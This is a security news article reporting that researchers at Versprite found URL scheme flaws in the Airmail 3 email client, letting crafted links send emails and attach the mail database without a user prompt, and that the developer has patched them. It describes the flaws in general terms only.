Application security, Network Security, Patch/Configuration Management, Vulnerability Management

URL scheme vulnerabilities patched in Airmail 3 email client


Developers behind the Airmail 3 email client for iPhone and Mac OS X have issued a software update after researchers from the security firm Versprite used reverse engineering to find vulnerabilities in its URL scheme.

In a highly technical report, Versprite, the company explains the URL its experts examined for Airmail's "send message" command had a single parameter that requires prior knowledge -- the "account" parameter, which determines which configured Airmail account is going to send the actual message. However, "Based on our observations, an account name is equal to the account's associated email address by default. In addition, Airmail's 'send' command does not require re-authentication. Not only does this allow local applications to send emails through Airmail's URL scheme, but it also introduces a dangerous phishing primitive."

Versprite also warns that because Airmail permits HTML content within emails, attacks can abuse the "send" command via a hyperlink placed in the email. "Modern applications should typically request permission from the user prior to forwarding requests to custom URL handlers," the report states. "Unfortunately, permission is not requested by Airmail, and the user is not prompted when the handler processes the 'send' command. Instead, Airmail will instantly send an attacker crafted email from the target account. At first glance, this may seem like a negligible issue, but this attack becomes much more concerning when file attachments are considered."

Among other issues, the researchers also noted that Airmail's email messages are stored in a particular database, but the path to this database is "relatively deterministic." Consequently, attackers can take advantage by crafting a payload that "exfiltrates a user's emails by attaching this database to an email sent to themselves."

In its latest software update, Airmail, which is owned by the Italian company Bloop SRL, refers to the vulnerabilities collectively as a "potential URL scheme vulnerability fix."

Bradley Barth

As director of multimedia content strategy at CyberRisk Alliance, Bradley Barth develops content for online conferences, webcasts, podcasts video/multimedia projects — often serving as moderator or host. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.